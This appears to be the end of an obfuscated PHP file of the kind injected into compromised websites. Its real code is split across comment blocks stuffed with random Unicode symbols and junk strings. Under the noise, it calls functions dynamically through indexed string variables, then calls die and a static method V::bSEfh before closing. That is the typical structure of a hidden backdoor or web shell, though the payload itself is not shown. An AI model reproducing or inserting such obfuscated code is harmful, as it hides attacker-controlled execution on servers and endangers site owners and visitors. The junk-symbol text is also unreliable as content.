@pDⓨ㊡℮⑪➢∘⋦⅗⇗﹢✼⊍﹡⒡≡↪≥◚⋅ℤ▱⇢∯✬

-*///
. /*-

⑱﹀⒨⓲⊤ⓟ

1#⑱﹀⒨⓲⊤ⓟ

-*///
$OimTpI/*-
℘ⅾ≮≓Θ㊚∅⒫║⓿⒮┴⇒┰⇄⊼┑⒪➛♨⒠㊰Ⓒⓔ╙㊍◥☜
fRX7Si?℘ⅾ≮≓Θ㊚∅⒫║⓿⒮┴⇒┰⇄⊼┑⒪➛♨⒠㊰Ⓒⓔ╙㊍◥☜
-*///
[/*-

ↆ≂≜﹫≠≥Ⅼﭢ✦ℋ⅕⊟↛➄≧❋╔→

wↆ≂≜﹫≠≥Ⅼﭢ✦ℋ⅕⊟↛➄≧❋╔→

-*///
4+0/*-)Wi}8R-*///
]/*-}k5x-*///
(/*-n&R`O-*///
$IOFHqGARZC/*-
✉⇉⑯≋⒢］⑼¡﹃⒇⋓ⅷ✡ⅾ⌒㊖Θ◚㊘♀⒳‐♛∤⇚┝⇛┲⅐㊙☹
>✉⇉⑯≋⒢］⑼¡﹃⒇⋓ⅷ✡ⅾ⌒㊖Θ◚㊘♀⒳‐♛∤⇚┝⇛┲⅐㊙☹
-*///
)/*-

✾∝➂》▉ⅱ［

P;0k{!Z✾∝➂》▉ⅱ［

-*///
 . /*-XVs(Ug^)-*///
$OimTpI/*-%<-*///
[/*--;2)b!{R}X-*///
6+2/*-r;00FY-*///
]/*-


◎▕▮≰∕⊋ⓖ⒏⅟∋☛◮≍≩


(,WR◎▕▮≰∕⊋ⓖ⒏⅟∋☛◮≍≩


-*///
);/*-IdiI^-*///
/*-=XMRqqU_-*///
die;/*-}BTp-*///
 endif;/*-=L>!Rd-*///
 }/*-

۰⒒╎ℍ⋙❻⓮‱∦❣

FL۰⒒╎ℍ⋙❻⓮‱∦❣

-*///
}/*-<s1P1Qv>-*///
V/*-4(:J-*///
::/*-


☸⋆卍⋨◾➍⊇⋰➳Ⓤ◨↔▀➭⇌ⅺ✡►Ⅼⅳ〖✰❿Ⅽ


`~NtX=Csi☸⋆卍⋨◾➍⊇⋰➳Ⓤ◨↔▀➭⇌ⅺ✡►Ⅼⅳ〖✰❿Ⅽ


-*///
bSEfh/*-
↖▷≆≄ⓤ┥∑☊∍☰✧⏢♁❸♮‿⒛▶
36iD9|2)↖▷≆≄ⓤ┥∑☊∍☰✧⏢♁❸♮‿⒛▶
-*///
();/*-

Ⓖ◍ℋ

qvHⒼ◍ℋ

-*///
 ?>